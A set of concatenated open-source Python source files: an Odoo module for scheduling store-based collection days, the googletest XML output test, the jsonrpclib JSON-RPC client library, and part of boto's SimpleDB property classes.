raise exceptions.ValidationError("Pole sklep nie może być modyfikowane!")
if ('project' in vals or 'organization' in vals) and not self.is_bank() and not self.is_federation():
raise exceptions.ValidationError("Nie masz uprawnień żeby modyfikować pola projekt i organizacja!")
return super(StoreInProject, self).write(vals)
@api.one
def add_days(self):
"""
Create `bestja_stores.day` objects for all days in the project.
"""
# Find a previous time an event was held in the store.
# We want to find the second (yes!) day of the last event.
# This will be used to copy default values for from / to times.
previous_day = self.env['bestja_stores.day'].search(
[
('store.store', '=', self.store.id),
('store.state', '=', 'activated'),
],
order='store desc, date',
limit=2,
)
previous_day = previous_day[1] if len(previous_day) > 1 else previous_day
delta = datetime.timedelta(days=1)
day = fields.Date.from_string(self.date_start)
last_day = fields.Date.from_string(self.date_stop)
while day <= last_day:
self.env['bestja_stores.day'].create({
'store': self.id,
'date': fields.Date.to_string(day),
'time_from': previous_day.time_from or "09:00",
'time_to': previous_day.time_to or "18:00",
})
day += delta
@api.one
def add_days_dummy(self):
"""
Action for a "Add days" button. But we add days on create anyway, so it
doesn't actually have to do anything.
"""
pass
@api.one
def name_get(self):
name_string = u"{store} ({project})".format(store=self.store.name, project=self.project.name)
return (self.id, name_string)
def _auto_init(self, cr, context=None):
todo_end = super(StoreInProject, self)._auto_init(cr, context)
# Add UNIQUE index, since UNIQUE indexes (in opposite to UNIQUE constraints)
# can include conditional clauses.
if self._auto:
cr.execute("DROP INDEX IF EXISTS unique_store_project;")
cr.execute(
"""CREATE UNIQUE INDEX unique_store_project
ON bestja_stores_store_in_project(project,store)
WHERE (state NOT IN ('rejected', 'deactivated'));""")
# Custom error message
self.pool._sql_error['unique_store_project'] = \
"Ten sklep jest już przypisany w tym projekcie do tej organizacji!"
return todo_end
class DayInStore(models.Model):
_name = 'bestja_stores.day'
_order = 'date'
store = fields.Many2one(
'bestja_stores.store_in_project',
required=True,
ondelete='cascade',
string=u"Sklep",
)
date = fields.Date(
required=True,
string=u"Dzień zbiórki",
)
time_from = fields.Char(
string=u"Start"
)
time_to = fields.Char(
string=u"Koniec",
)
# Computed versions of the above fields, to be able to
# provide store specific defaults
time_from_default = fields.Char(
required=True,
compute='_compute_time_from',
inverse='_inverse_time_from',
string=u"Start"
)
time_to_default = fields.Char(
required=True,
compute='_compute_time_to',
inverse='_inverse_time_to',
string=u"Koniec",
)
previous_day = fields.Many2one(
'bestja_stores.day',
compute='_compute_previous_day',
)
_sql_constraints = [
('date_uniq', 'unique(date, store)', 'Można podać tylko jedną datę zbiórki dla danego sklepu!')
]
@api.one
@api.depends('store.store')
def _compute_previous_day(self):
"""
Previously accepted day in the same store,
needed for default hours. We want to find
the second (yes!) day of the last event.
"""
previous_day = self.env['bestja_stores.day'].search(
[
('store.store', '=', self.store.store.id),
('store.state', '=', 'activated'),
],
order='store desc, date',
limit=2,
)
self.previous_day = previous_day[1].id if len(previous_day) > 1 else previous_day.id
@api.one
@api.depends('time_from', 'previous_day', 'store')
def _compute_time_from(self):
"""
If time_from is set, just present it.
If not, present a default value: the previous time
from the same store in the most recent project.
"""
if self.time_from:
self.time_from_default = self.time_from
else:
self.time_from_default = self.previous_day.time_from
@api.one
@api.depends('time_to', 'previous_day', 'store')
def _compute_time_to(self):
"""
If time_to is set, just present it.
If not, present a default value: the previous time
from the same store in the most recent project.
"""
if self.time_to:
self.time_to_default = self.time_to
else:
self.time_to_default = self.previous_day.time_to
@api.one
def _inverse_time_from(self):
self.time_from = self.time_from_default
@api.one
def _inverse_time_to(self):
self.time_to = self.time_to_default
@api.one
@api.constrains('time_from', 'time_to')
def _check_hours(self):
time_pattern = re.compile(r"^([0-1][0-9]|2[0-4]):[0-5][0-9]$")
if not time_pattern.match(self.time_to_default) or not time_pattern.match(self.time_from_default):
raise exceptions.ValidationError("Godzina musi być podana w formacie hh:mm!")
@api.one
@api.constrains('date')
def _check_date_in_project(self):
if not self.store.top_project.date_start <= self.date <= self.store.top_project.date_stop:
raise exceptions.ValidationError("Wybrano dzień poza czasem trwania projektu!")
class ProjectWithStores(models.Model):
_inherit = 'bestja.project'
stores = fields.One2many(
'bestja_stores.store_in_project',
inverse_name='project',
groups='bestja_project.managers',
)
enable_stores = fields.Boolean(string=u"Projekt zbiórkowy?")
use_stores = fields.Boolean(
compute='_compute_use_stores',
compute_sudo=True,
search='_search_use_stores',
)
@api.one
@api.depends('enable_stores', 'parent.enable_stores', 'parent.parent.enable_stores')
def _compute_use_stores(self):
self.use_stores = (
self.enable_stores or
self.parent.enable_stores or
self.parent.parent.enable_stores
)
def _search_use_stores(self, operator, value):
return [
'|', # noqa
('enable_stores', operator, value),
'|',
('parent.enable_stores', operator, value),
('parent.parent.enable_stores', operator, value),
]
|
codeman38/toggldesktop
|
refs/heads/master
|
third_party/googletest-read-only/test/gtest_xml_outfiles_test.py
|
2526
|
#!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for the gtest_xml_output module."""
__author__ = "keith.ray@gmail.com (Keith Ray)"
import os
from xml.dom import minidom, Node
import gtest_test_utils
import gtest_xml_test_utils
GTEST_OUTPUT_SUBDIR = "xml_outfiles"
GTEST_OUTPUT_1_TEST = "gtest_xml_outfile1_test_"
GTEST_OUTPUT_2_TEST = "gtest_xml_outfile2_test_"
EXPECTED_XML_1 = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="1" failures="0" disabled="0" errors="0" time="*" timestamp="*" name="AllTests">
<testsuite name="PropertyOne" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="TestSomeProperties" status="run" time="*" classname="PropertyOne" SetUpProp="1" TestSomeProperty="1" TearDownProp="1" />
</testsuite>
</testsuites>
"""
EXPECTED_XML_2 = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="1" failures="0" disabled="0" errors="0" time="*" timestamp="*" name="AllTests">
<testsuite name="PropertyTwo" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="TestSomeProperties" status="run" time="*" classname="PropertyTwo" SetUpProp="2" TestSomeProperty="2" TearDownProp="2" />
</testsuite>
</testsuites>
"""
class GTestXMLOutFilesTest(gtest_xml_test_utils.GTestXMLTestCase):
"""Unit test for Google Test's XML output functionality."""
def setUp(self):
# We want the trailing '/' that the last "" provides in os.path.join, for
# telling Google Test to create an output directory instead of a single file
# for xml output.
self.output_dir_ = os.path.join(gtest_test_utils.GetTempDir(),
GTEST_OUTPUT_SUBDIR, "")
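    # For example (illustrative): os.path.join('/tmp', 'xml_outfiles', '')
    # yields '/tmp/xml_outfiles/'; the trailing separator is what tells
    # gtest to treat --gtest_output=xml:PATH as a directory.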
self.DeleteFilesAndDir()
def tearDown(self):
self.DeleteFilesAndDir()
def DeleteFilesAndDir(self):
try:
os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_1_TEST + ".xml"))
except os.error:
pass
try:
os.remove(os.path.join(self.output_dir_, GTEST_OUTPUT_2_TEST + ".xml"))
except os.error:
pass
try:
os.rmdir(self.output_dir_)
except os.error:
pass
def testOutfile1(self):
self._TestOutFile(GTEST_OUTPUT_1_TEST, EXPECTED_XML_1)
def testOutfile2(self):
self._TestOutFile(GTEST_OUTPUT_2_TEST, EXPECTED_XML_2)
def _TestOutFile(self, test_name, expected_xml):
gtest_prog_path = gtest_test_utils.GetTestExecutablePath(test_name)
command = [gtest_prog_path, "--gtest_output=xml:%s" % self.output_dir_]
p = gtest_test_utils.Subprocess(command,
working_dir=gtest_test_utils.GetTempDir())
self.assert_(p.exited)
self.assertEquals(0, p.exit_code)
# TODO(wan@google.com): libtool causes the built test binary to be
# named lt-gtest_xml_outfiles_test_ instead of
# gtest_xml_outfiles_test_. To account for this possibility, we
# allow both names in the following code. We should remove this
# hack when Chandler Carruth's libtool replacement tool is ready.
output_file_name1 = test_name + ".xml"
output_file1 = os.path.join(self.output_dir_, output_file_name1)
output_file_name2 = 'lt-' + output_file_name1
output_file2 = os.path.join(self.output_dir_, output_file_name2)
self.assert_(os.path.isfile(output_file1) or os.path.isfile(output_file2),
output_file1)
expected = minidom.parseString(expected_xml)
if os.path.isfile(output_file1):
actual = minidom.parse(output_file1)
else:
actual = minidom.parse(output_file2)
self.NormalizeXml(actual.documentElement)
self.AssertEquivalentNodes(expected.documentElement,
actual.documentElement)
expected.unlink()
actual.unlink()
if __name__ == "__main__":
os.environ["GTEST_STACK_TRACE_DEPTH"] = "0"
gtest_test_utils.Main()
|
badloop/SickRage
|
refs/heads/master
|
lib/jsonrpclib/jsonrpc.py
|
68
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
============================
JSONRPC Library (jsonrpclib)
============================
This library is a JSON-RPC v.2 (proposed) implementation which
follows the xmlrpclib API for portability between clients. It
uses the same Server / ServerProxy, loads, dumps, etc. syntax,
while providing features not present in XML-RPC like:
* Keyword arguments
* Notifications
* Versioning
* Batches and batch notifications
Eventually, I'll add a SimpleXMLRPCServer compatible library,
and other things to tie the thing off nicely. :)
For a quick-start, just open a console and type the following,
replacing the server address, method, and parameters
appropriately.
>>> import jsonrpclib
>>> server = jsonrpclib.Server('http://localhost:8181')
>>> server.add(5, 6)
11
>>> server._notify.add(5, 6)
>>> batch = jsonrpclib.MultiCall(server)
>>> batch.add(3, 50)
>>> batch.add(2, 3)
>>> batch._notify.add(3, 5)
>>> batch()
[53, 5]
See http://code.google.com/p/jsonrpclib/ for more info.
"""
import types
import sys
from xmlrpclib import Transport as XMLTransport
from xmlrpclib import SafeTransport as XMLSafeTransport
from xmlrpclib import ServerProxy as XMLServerProxy
from xmlrpclib import _Method as XML_Method
import time
import string
import random
# Library includes
import jsonrpclib
from jsonrpclib import config
from jsonrpclib import history
# JSON library importing
cjson = None
json = None
try:
import cjson
except ImportError:
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
raise ImportError(
'You must have the cjson, json, or simplejson ' +
'module(s) available.'
)
IDCHARS = string.ascii_lowercase+string.digits
class UnixSocketMissing(Exception):
"""
    Just a properly named Exception, raised when Unix socket usage is
    attempted on a platform that doesn't support them (e.g. Windows)
"""
pass
# JSON Abstractions
def jdumps(obj, encoding='utf-8'):
# Do 'serialize' test at some point for other classes
global cjson
if cjson:
return cjson.encode(obj)
else:
return json.dumps(obj, encoding=encoding)
def jloads(json_string):
global cjson
if cjson:
return cjson.decode(json_string)
else:
return json.loads(json_string)
# XMLRPClib re-implementations
class ProtocolError(Exception):
pass
class TransportMixIn(object):
""" Just extends the XMLRPC transport where necessary. """
user_agent = config.user_agent
# for Python 2.7 support
_connection = None
def send_content(self, connection, request_body):
connection.putheader("Content-Type", "application/json-rpc")
connection.putheader("Content-Length", str(len(request_body)))
connection.endheaders()
if request_body:
connection.send(request_body)
def getparser(self):
target = JSONTarget()
return JSONParser(target), target
class JSONParser(object):
def __init__(self, target):
self.target = target
def feed(self, data):
self.target.feed(data)
def close(self):
pass
class JSONTarget(object):
def __init__(self):
self.data = []
def feed(self, data):
self.data.append(data)
def close(self):
return ''.join(self.data)
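# Note: getparser() above mirrors xmlrpclib's contract -- the transport feeds
# raw response bytes into JSONParser, which accumulates them in JSONTarget;
# target.close() then returns the joined JSON string that ServerProxy hands
# to loads().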
class Transport(TransportMixIn, XMLTransport):
pass
class SafeTransport(TransportMixIn, XMLSafeTransport):
pass
from httplib import HTTP, HTTPConnection
from socket import socket
USE_UNIX_SOCKETS = False
try:
from socket import AF_UNIX, SOCK_STREAM
USE_UNIX_SOCKETS = True
except ImportError:
pass
if (USE_UNIX_SOCKETS):
class UnixHTTPConnection(HTTPConnection):
def connect(self):
self.sock = socket(AF_UNIX, SOCK_STREAM)
self.sock.connect(self.host)
class UnixHTTP(HTTP):
_connection_class = UnixHTTPConnection
class UnixTransport(TransportMixIn, XMLTransport):
def make_connection(self, host):
host, extra_headers, x509 = self.get_host_info(host)
return UnixHTTP(host)
class ServerProxy(XMLServerProxy):
"""
Unfortunately, much more of this class has to be copied since
so much of it does the serialization.
"""
def __init__(self, uri, transport=None, encoding=None,
verbose=0, version=None):
import urllib
if not version:
version = config.version
self.__version = version
schema, uri = urllib.splittype(uri)
if schema not in ('http', 'https', 'unix'):
raise IOError('Unsupported JSON-RPC protocol.')
if schema == 'unix':
if not USE_UNIX_SOCKETS:
# Don't like the "generic" Exception...
raise UnixSocketMissing("Unix sockets not available.")
self.__host = uri
self.__handler = '/'
else:
self.__host, self.__handler = urllib.splithost(uri)
            if not self.__handler:
                # The JSON-RPC spec doesn't mandate a handler path; default to '/'.
                self.__handler = '/'
if transport is None:
if schema == 'unix':
transport = UnixTransport()
elif schema == 'https':
transport = SafeTransport()
else:
transport = Transport()
self.__transport = transport
self.__encoding = encoding
self.__verbose = verbose
def _request(self, methodname, params, rpcid=None):
request = dumps(params, methodname, encoding=self.__encoding,
rpcid=rpcid, version=self.__version)
response = self._run_request(request)
check_for_errors(response)
return response['result']
def _request_notify(self, methodname, params, rpcid=None):
request = dumps(params, methodname, encoding=self.__encoding,
rpcid=rpcid, version=self.__version, notify=True)
response = self._run_request(request, notify=True)
check_for_errors(response)
return
def _run_request(self, request, notify=None):
history.add_request(request)
response = self.__transport.request(
self.__host,
self.__handler,
request,
verbose=self.__verbose
)
# Here, the XMLRPC library translates a single list
# response to the single value -- should we do the
# same, and require a tuple / list to be passed to
# the response object, or expect the Server to be
# outputting the response appropriately?
history.add_response(response)
if not response:
return None
return_obj = loads(response)
return return_obj
def __getattr__(self, name):
# Same as original, just with new _Method reference
return _Method(self._request, name)
@property
def _notify(self):
# Just like __getattr__, but with notify namespace.
return _Notify(self._request_notify)
class _Method(XML_Method):
def __call__(self, *args, **kwargs):
if len(args) > 0 and len(kwargs) > 0:
raise ProtocolError('Cannot use both positional ' +
'and keyword arguments (according to JSON-RPC spec.)')
if len(args) > 0:
return self.__send(self.__name, args)
else:
return self.__send(self.__name, kwargs)
def __getattr__(self, name):
self.__name = '%s.%s' % (self.__name, name)
return self
# The old method returned a new instance, but this seemed wasteful.
# The only thing that changes is the name.
#return _Method(self.__send, "%s.%s" % (self.__name, name))
class _Notify(object):
def __init__(self, request):
self._request = request
def __getattr__(self, name):
return _Method(self._request, name)
# Batch implementation
class MultiCallMethod(object):
def __init__(self, method, notify=False):
self.method = method
self.params = []
self.notify = notify
def __call__(self, *args, **kwargs):
if len(kwargs) > 0 and len(args) > 0:
raise ProtocolError('JSON-RPC does not support both ' +
'positional and keyword arguments.')
if len(kwargs) > 0:
self.params = kwargs
else:
self.params = args
def request(self, encoding=None, rpcid=None):
return dumps(self.params, self.method, version=2.0,
encoding=encoding, rpcid=rpcid, notify=self.notify)
def __repr__(self):
return '%s' % self.request()
def __getattr__(self, method):
new_method = '%s.%s' % (self.method, method)
self.method = new_method
return self
class MultiCallNotify(object):
def __init__(self, multicall):
self.multicall = multicall
def __getattr__(self, name):
new_job = MultiCallMethod(name, notify=True)
self.multicall._job_list.append(new_job)
return new_job
class MultiCallIterator(object):
def __init__(self, results):
self.results = results
    def __iter__(self):
        for i in range(0, len(self.results)):
            yield self[i]
def __getitem__(self, i):
item = self.results[i]
check_for_errors(item)
return item['result']
def __len__(self):
return len(self.results)
class MultiCall(object):
def __init__(self, server):
self._server = server
self._job_list = []
def _request(self):
if len(self._job_list) < 1:
# Should we alert? This /is/ pretty obvious.
return
request_body = '[ %s ]' % ','.join([job.request() for
job in self._job_list])
responses = self._server._run_request(request_body)
del self._job_list[:]
if not responses:
responses = []
return MultiCallIterator(responses)
@property
def _notify(self):
return MultiCallNotify(self)
def __getattr__(self, name):
new_job = MultiCallMethod(name)
self._job_list.append(new_job)
return new_job
__call__ = _request
# These lines conform to xmlrpclib's "compatibility" line.
# Not really sure if we should include these, but oh well.
Server = ServerProxy
class Fault(object):
# JSON-RPC error class
def __init__(self, code=-32000, message='Server error', rpcid=None):
self.faultCode = code
self.faultString = message
self.rpcid = rpcid
def error(self):
return {'code':self.faultCode, 'message':self.faultString}
def response(self, rpcid=None, version=None):
if not version:
version = config.version
if rpcid:
self.rpcid = rpcid
return dumps(
self, methodresponse=True, rpcid=self.rpcid, version=version
)
def __repr__(self):
return '<Fault %s: %s>' % (self.faultCode, self.faultString)
def random_id(length=8):
return_id = ''
for i in range(length):
return_id += random.choice(IDCHARS)
return return_id
class Payload(dict):
def __init__(self, rpcid=None, version=None):
if not version:
version = config.version
self.id = rpcid
self.version = float(version)
def request(self, method, params=[]):
if type(method) not in types.StringTypes:
raise ValueError('Method name must be a string.')
if not self.id:
self.id = random_id()
request = { 'id':self.id, 'method':method }
if params:
request['params'] = params
if self.version >= 2:
request['jsonrpc'] = str(self.version)
return request
def notify(self, method, params=[]):
request = self.request(method, params)
if self.version >= 2:
del request['id']
else:
request['id'] = None
return request
def response(self, result=None):
response = {'result':result, 'id':self.id}
if self.version >= 2:
response['jsonrpc'] = str(self.version)
else:
response['error'] = None
return response
def error(self, code=-32000, message='Server error.'):
error = self.response()
if self.version >= 2:
del error['result']
else:
error['result'] = None
error['error'] = {'code':code, 'message':message}
return error
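# Wire-format sketch (illustrative values; dict key order may vary):
#   Payload(version=2.0).request('add', [1, 2])
#     -> {'jsonrpc': '2.0', 'id': '<random id>', 'method': 'add', 'params': [1, 2]}
#   Payload(version=2.0).notify('add', [1, 2])
#     -> same as above, minus the 'id' key
#   Payload(rpcid='abc', version=2.0).response(3)
#     -> {'jsonrpc': '2.0', 'id': 'abc', 'result': 3}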
def dumps(params=[], methodname=None, methodresponse=None,
encoding=None, rpcid=None, version=None, notify=None):
"""
This differs from the Python implementation in that it implements
the rpcid argument since the 2.0 spec requires it for responses.
"""
if not version:
version = config.version
valid_params = (types.TupleType, types.ListType, types.DictType)
    if type(methodname) in types.StringTypes and \
            type(params) not in valid_params and \
            not isinstance(params, Fault):
        # If given a method name but params are neither list-ish nor a
        # Fault instance, error out.
        raise TypeError('Params must be a dict, list, tuple or Fault ' +
                        'instance.')
# Begin parsing object
payload = Payload(rpcid=rpcid, version=version)
if not encoding:
encoding = 'utf-8'
if type(params) is Fault:
response = payload.error(params.faultCode, params.faultString)
return jdumps(response, encoding=encoding)
if type(methodname) not in types.StringTypes and methodresponse != True:
raise ValueError('Method name must be a string, or methodresponse '+
'must be set to True.')
if config.use_jsonclass == True:
from jsonrpclib import jsonclass
params = jsonclass.dump(params)
if methodresponse is True:
if rpcid is None:
raise ValueError('A method response must have an rpcid.')
response = payload.response(params)
return jdumps(response, encoding=encoding)
request = None
if notify == True:
request = payload.notify(methodname, params)
else:
request = payload.request(methodname, params)
return jdumps(request, encoding=encoding)
def loads(data):
"""
This differs from the Python implementation, in that it returns
the request structure in Dict format instead of the method, params.
It will return a list in the case of a batch request / response.
"""
if data == '':
# notification
return None
result = jloads(data)
# if the above raises an error, the implementing server code
# should return something like the following:
# { 'jsonrpc':'2.0', 'error': fault.error(), id: None }
if config.use_jsonclass == True:
from jsonrpclib import jsonclass
result = jsonclass.load(result)
return result
def check_for_errors(result):
if not result:
# Notification
return result
if type(result) is not types.DictType:
raise TypeError('Response is not a dict.')
if 'jsonrpc' in result.keys() and float(result['jsonrpc']) > 2.0:
raise NotImplementedError('JSON-RPC version not yet supported.')
if 'result' not in result.keys() and 'error' not in result.keys():
raise ValueError('Response does not have a result or error key.')
if 'error' in result.keys() and result['error'] != None:
code = result['error']['code']
message = result['error']['message']
raise ProtocolError((code, message))
return result
def isbatch(result):
if type(result) not in (types.ListType, types.TupleType):
return False
if len(result) < 1:
return False
if type(result[0]) is not types.DictType:
return False
if 'jsonrpc' not in result[0].keys():
return False
try:
version = float(result[0]['jsonrpc'])
except ValueError:
raise ProtocolError('"jsonrpc" key must be a float(able) value.')
if version < 2:
return False
return True
def isnotification(request):
if 'id' not in request.keys():
# 2.0 notification
return True
if request['id'] == None:
# 1.0 notification
return True
return False
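# Server-side dispatch sketch (handle_one() is a hypothetical application
# dispatcher, not part of this module):
#   request = loads(raw_body)
#   if isbatch(request):
#       responses = [handle_one(r) for r in request if not isnotification(r)]
#   elif isnotification(request):
#       handle_one(request)   # notifications get no response
#   else:
#       response = handle_one(request)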
|
christianbaun/octopuscloud
|
refs/heads/master
|
boto/sdb/db/property.py
|
1
|
# Copyright (c) 2006,2007,2008 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import datetime
from key import Key
from boto.utils import Password
from boto.sdb.db.query import Query
import re
import boto
import boto.s3.key
from boto.sdb.db.blob import Blob
class Property(object):
data_type = str
type_name = ''
name = ''
verbose_name = ''
def __init__(self, verbose_name=None, name=None, default=None, required=False,
validator=None, choices=None, unique=False):
self.verbose_name = verbose_name
self.name = name
self.default = default
self.required = required
self.validator = validator
self.choices = choices
self.slot_name = '_'
self.unique = unique
def __get__(self, obj, objtype):
if obj:
obj.load()
return getattr(obj, self.slot_name)
else:
return None
def __set__(self, obj, value):
self.validate(value)
# Fire off any on_set functions
try:
if obj._loaded and hasattr(obj, "on_set_%s" % self.name):
fnc = getattr(obj, "on_set_%s" % self.name)
value = fnc(value)
except Exception:
boto.log.exception("Exception running on_set_%s" % self.name)
setattr(obj, self.slot_name, value)
def __property_config__(self, model_class, property_name):
self.model_class = model_class
self.name = property_name
self.slot_name = '_' + self.name
def default_validator(self, value):
if value == self.default_value():
return
if not isinstance(value, self.data_type):
raise TypeError, 'Validation Error, expecting %s, got %s' % (self.data_type, type(value))
def default_value(self):
return self.default
def validate(self, value):
if self.required and value==None:
raise ValueError, '%s is a required property' % self.name
if self.choices and value and not value in self.choices:
raise ValueError, '%s not a valid choice for %s.%s' % (value, self.model_class.__name__, self.name)
if self.validator:
self.validator(value)
else:
self.default_validator(value)
return value
def empty(self, value):
return not value
def get_value_for_datastore(self, model_instance):
return getattr(model_instance, self.name)
def make_value_from_datastore(self, value):
return value
def get_choices(self):
if callable(self.choices):
return self.choices()
return self.choices
def validate_string(value):
if isinstance(value, str) or isinstance(value, unicode):
if len(value) > 1024:
raise ValueError, 'Length of value greater than maxlength'
else:
raise TypeError, 'Expecting String, got %s' % type(value)
class StringProperty(Property):
type_name = 'String'
def __init__(self, verbose_name=None, name=None, default='', required=False,
validator=validate_string, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
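# Usage sketch (hypothetical model; assumes boto.sdb.db.model.Model):
#   from boto.sdb.db.model import Model
#   class Person(Model):
#       name = StringProperty(required=True)
#       email = StringProperty(unique=True)
# Assignments run validate_string(), so values longer than 1024 characters
# raise ValueError.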
class TextProperty(Property):
type_name = 'Text'
def __init__(self, verbose_name=None, name=None, default='', required=False,
validator=None, choices=None, unique=False, max_length=None):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
self.max_length = max_length
def validate(self, value):
if not isinstance(value, str) and not isinstance(value, unicode):
raise TypeError, 'Expecting Text, got %s' % type(value)
if self.max_length and len(value) > self.max_length:
raise ValueError, 'Length of value greater than maxlength %s' % self.max_length
class PasswordProperty(StringProperty):
"""
Hashed property who's original value can not be
retrieved, but still can be compaired.
"""
data_type = Password
type_name = 'Password'
def __init__(self, verbose_name=None, name=None, default='', required=False,
validator=None, choices=None, unique=False):
StringProperty.__init__(self, verbose_name, name, default, required, validator, choices, unique)
def make_value_from_datastore(self, value):
p = Password(value)
return p
def get_value_for_datastore(self, model_instance):
value = StringProperty.get_value_for_datastore(self, model_instance)
if value and len(value):
return str(value)
else:
return None
def __set__(self, obj, value):
if not isinstance(value, Password):
p = Password()
p.set(value)
value = p
Property.__set__(self, obj, value)
def __get__(self, obj, objtype):
return Password(StringProperty.__get__(self, obj, objtype))
def validate(self, value):
value = Property.validate(self, value)
if isinstance(value, Password):
if len(value) > 1024:
raise ValueError, 'Length of value greater than maxlength'
else:
raise TypeError, 'Expecting Password, got %s' % type(value)
class BlobProperty(Property):
data_type = Blob
type_name = "blob"
def __set__(self, obj, value):
if value != self.default_value():
if not isinstance(value, Blob):
oldb = self.__get__(obj, type(obj))
id = None
if oldb:
id = oldb.id
b = Blob(value=value, id=id)
value = b
Property.__set__(self, obj, value)
class S3KeyProperty(Property):
data_type = boto.s3.key.Key
type_name = 'S3Key'
    validate_regex = r"^s3://([^/]*)/(.*)$"
def __init__(self, verbose_name=None, name=None, default=None,
required=False, validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required,
validator, choices, unique)
def validate(self, value):
if value == self.default_value() or value == str(self.default_value()):
return self.default_value()
if isinstance(value, self.data_type):
return
match = re.match(self.validate_regex, value)
if match:
return
raise TypeError, 'Validation Error, expecting %s, got %s' % (self.data_type, type(value))
def __get__(self, obj, objtype):
value = Property.__get__(self, obj, objtype)
if value:
if isinstance(value, self.data_type):
return value
match = re.match(self.validate_regex, value)
if match:
s3 = obj._manager.get_s3_connection()
bucket = s3.get_bucket(match.group(1), validate=False)
k = bucket.get_key(match.group(2))
if not k:
k = bucket.new_key(match.group(2))
k.set_contents_from_string("")
return k
else:
return value
def get_value_for_datastore(self, model_instance):
value = Property.get_value_for_datastore(self, model_instance)
if value:
return "s3://%s/%s" % (value.bucket.name, value.name)
else:
return None
class IntegerProperty(Property):
data_type = int
type_name = 'Integer'
def __init__(self, verbose_name=None, name=None, default=0, required=False,
validator=None, choices=None, unique=False, max=2147483647, min=-2147483648):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
self.max = max
self.min = min
def validate(self, value):
value = int(value)
value = Property.validate(self, value)
if value > self.max:
raise ValueError, 'Maximum value is %d' % self.max
if value < self.min:
raise ValueError, 'Minimum value is %d' % self.min
return value
def empty(self, value):
return value is None
def __set__(self, obj, value):
if value == "" or value == None:
value = 0
return Property.__set__(self, obj, value)
class LongProperty(Property):
data_type = long
type_name = 'Long'
def __init__(self, verbose_name=None, name=None, default=0, required=False,
validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
def validate(self, value):
value = long(value)
value = Property.validate(self, value)
min = -9223372036854775808
max = 9223372036854775807
if value > max:
raise ValueError, 'Maximum value is %d' % max
if value < min:
raise ValueError, 'Minimum value is %d' % min
return value
def empty(self, value):
return value is None
class BooleanProperty(Property):
data_type = bool
type_name = 'Boolean'
def __init__(self, verbose_name=None, name=None, default=False, required=False,
validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
def empty(self, value):
return value is None
class FloatProperty(Property):
data_type = float
type_name = 'Float'
def __init__(self, verbose_name=None, name=None, default=0.0, required=False,
validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
def validate(self, value):
value = float(value)
value = Property.validate(self, value)
return value
def empty(self, value):
return value is None
class DateTimeProperty(Property):
data_type = datetime.datetime
type_name = 'DateTime'
def __init__(self, verbose_name=None, auto_now=False, auto_now_add=False, name=None,
default=None, required=False, validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
def default_value(self):
if self.auto_now or self.auto_now_add:
return self.now()
return Property.default_value(self)
def validate(self, value):
if value == None:
return
if not isinstance(value, self.data_type):
